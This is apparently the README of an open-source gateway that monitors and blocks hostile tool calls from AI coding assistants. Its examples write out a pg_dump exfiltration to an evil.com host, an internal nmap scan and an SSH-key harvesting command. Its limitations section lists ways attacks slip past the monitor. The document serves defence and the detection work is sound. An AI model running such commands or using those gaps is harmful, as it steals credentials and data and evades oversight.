Real-time threat detection for AI coding assistants. Prevents insider threats, compromised accounts, and rogue AI agents from weaponizing Claude Code, GitHub Copilot, Cursor, and Windsurf.
Detection Rate: 75-85% against sophisticated attacks (GTG-1002-class)
Latency: <50ms P95
Deployment: Self-hosted, Docker-ready
git clone https://github.com/clay-good/proxilion
cd proxilion
# Start in monitor mode (logs only, never blocks)
docker compose up -d
# Test threat detection
./demo.sh
# Expected output:
# ✓ Safe commands allowed (ls -la)
# ✓ Network scanning blocked (nmap → score 100, TERMINATE)
# ✓ Credential theft prevented (.env → score 86, BLOCK)
# ✓ SSH key harvesting blocked (id_rsa → score 100, TERMINATE)Access Points:
- Gateway API:
http://localhost:8787 - Health check:
curl http://localhost:8787/health - Metrics:
http://localhost:8787/metrics
# Build
cargo build --release
# Run in monitor mode
SESSION_STORE=inmemory MODE=monitor ./target/release/proxilion-gateway
# Run in block mode (production)
SESSION_STORE=redis REDIS_URL=redis://localhost:6379 MODE=block ./target/release/proxilion-gatewaydocker compose --profile monitoring up -d- Grafana:
http://localhost:3001(admin/admin) - Prometheus:
http://localhost:9090
AI Assistant (Claude Code, Copilot)
↓
Proxilion Gateway (<50ms analysis)
↓
Decision: Allow | Alert | Block | Terminate
↓
Tool Execution (MCP Server)
25 Threat Analyzers running in parallel:
- Pattern-based (15): Hacking tools, credential access, exfiltration, enumeration
- Session-aware (5): Multi-phase attack progression, request rate, correlation
- Semantic (5): Social engineering, AI autonomy, conversation analysis
| Threat Type | Detection Rate | Examples |
|---|---|---|
| Network Reconnaissance | 95-100% | nmap, masscan, port scanning |
| Credential Harvesting | 90-95% | SSH keys, .env files, AWS credentials |
| Data Exfiltration | 85-90% | Large transfers, pastebin uploads, curl to external IPs |
| Multi-Phase Attacks | 85-90% | Session tracking: recon → access → exfil |
| Social Engineering | 70-80% | Requires conversation context + Claude API |
| Overall (GTG-1002-class) | 75-85% | In controlled testing |
Employee attempts database exfiltration:
pg_dump production_db | curl -F "file=@-" https://evil.com/uploadProxilion: BLOCKED (score 92) - Exfiltration + unauthorized endpoint
Attacker scans internal network:
nmap -sV 10.0.0.0/24Proxilion: BLOCKED (score 88) - Reconnaissance tool + internal network
AI agent harvests SSH keys:
find /home -name "id_rsa" -exec cat {} \;Proxilion: BLOCKED (score 86) - Credential harvesting + bulk access
# Core settings
MODE=monitor # monitor | alert | block | terminate
SESSION_STORE=redis # inmemory | redis
REDIS_URL=redis://localhost:6379
# Thresholds
ALERT_THRESHOLD=50 # Log + alert
BLOCK_THRESHOLD=70 # Prevent execution
TERMINATE_THRESHOLD=90 # Kill entire session
# Optional: Semantic analysis (social engineering detection)
ENABLE_SEMANTIC_ANALYSIS=false
ANTHROPIC_API_KEY=sk-ant-xxx # Required if enabled| Mode | Behavior | Use Case |
|---|---|---|
monitor |
Log all threats, never block | Baseline collection, testing |
alert |
Log + alert on scores ≥50 | Staging environments |
block |
Block requests with scores ≥70 | Production (recommended) |
terminate |
Block ≥70, terminate session ≥90 | High-security environments |
npm install @proxilion/mcp-middlewareimport { ProxilionMCPClient } from '@proxilion/mcp-middleware';
const client = new ProxilionMCPClient({
proxilionEndpoint: 'http://localhost:8787',
userId: 'user@company.com',
mode: 'block',
});
// Track conversation for social engineering detection
client.addConversationTurn(userMessage, aiResponse);
// Execute with security analysis
const result = await client.callToolWithAnalysis(toolCall, executeFunc);pip install proxilion-mcpfrom proxilion_mcp import ProxilionMCPClient, ProxilionConfig
client = ProxilionMCPClient(ProxilionConfig(
proxilion_endpoint="http://localhost:8787",
user_id="user@company.com",
mode="block",
))
result = await client.call_tool_with_analysis(tool_call, execute_func)See examples/ for complete integration examples.
Analyze a tool call for threats.
Request:
{
"tool_call": {
"Bash": {
"command": "nmap -sV target.com",
"args": [],
"env": {}
}
},
"user_id": "user@company.com",
"session_id": "session_123",
"user_message": "Can you scan the network?",
"ai_response": "I'll run nmap to scan"
}Response:
{
"decision": "Block",
"threat_score": 95.0,
"patterns_detected": [
"nmap reconnaissance tool detected",
"Port scanning flags detected",
"Network scanner detected"
],
"analyzer_scores": {
"hacking_tools": 85.0,
"enumeration": 75.0
},
"session_terminated": false
}Status Codes:
200 OK- Analysis complete (Allow/Alert)403 Forbidden- Blocked or Terminated500 Internal Server Error- Gateway error
Why Rust?
- Memory safety (gateway can't become attack vector)
- <50ms P95 latency (zero-cost abstractions, no GC pauses)
- Single binary deployment (no dependencies)
- 10,000+ req/sec throughput per instance
- Production-grade reliability
Why MCP Layer?
- Universal coverage (works with any MCP-compatible AI tool)
- Pre-execution analysis (block before damage)
- Conversation context (detect social engineering)
- Session correlation (track multi-phase attacks)
Components:
- Gateway (
crates/gateway) - HTTP API, request routing - Threat Engine (
crates/threat-engine) - 25 analyzers, scoring - Session State (
crates/session-state) - Redis + in-memory correlation - MCP Protocol (
crates/mcp-protocol) - Tool call parsing
See ARCHITECTURE.md for technical deep dive.
This is not a silver bullet. Use as one layer in defense-in-depth.
Architectural Constraints:
- MCP-layer only (cannot see AI planning above tool execution)
- Pattern-based limits (novel attacks may evade)
- Requires persistent session IDs from clients
- False positives possible (requires tuning)
What We Miss:
- Strategic planning before first tool call
- Attacks fragmented into 50+ micro-requests over months
- Non-MCP AI systems
- Direct network attacks (only analyzes tool calls)
See ARCHITECTURAL_LIMITATIONS.md for complete analysis.
Deploy behind authentication. Proxilion does not implement authentication - it relies on upstream systems (API gateway, reverse proxy) to verify user identity.
Recommended Architecture:
Client (with auth token)
↓
API Gateway / Reverse Proxy (OAuth, API key)
↓
Proxilion Gateway (threat analysis)
↓
MCP Server (tool execution)
Best Practices:
- Network isolation (private VPC, security groups)
- TLS/SSL in production
- Secrets management (AWS Secrets Manager, Vault)
- Redis authentication (requirepass, SSL/TLS)
- Resource limits (Docker memory/CPU)
See SECURITY.md for vulnerability reporting and detailed guidance.
- Quick Start - QUICK_START.md - 5-minute deployment
- Platform-Specific - DEPLOYMENT_GUIDES.md - GitHub, Anthropic, Microsoft integrations
- Architecture - ARCHITECTURE.md - System design and technical decisions
- Security - SECURITY.md - Vulnerability reporting and best practices
- API Reference - API_REFERENCE.md - Complete API documentation
# Run all tests (160 tests, 100% pass rate)
cargo test
# Run demo
./demo.shBefore deploying to production:
- Run in monitor mode for 1+ week
- Review false positive rate (target: <5%)
- Configure Redis for session persistence
- Set up Prometheus + Grafana monitoring
- Configure alerts for high threat scores
- Deploy behind authentication layer
- Enable TLS/SSL
- Test fail-open vs fail-closed behavior
MIT License - Use, modify, and deploy freely.
- Rust 1.70+ (memory safety, performance)
- Tokio (async runtime)
- Axum (HTTP framework)
- Redis (session correlation)
- Prometheus + Grafana (monitoring)
- Docker (deployment)
160 tests passing. Production-ready.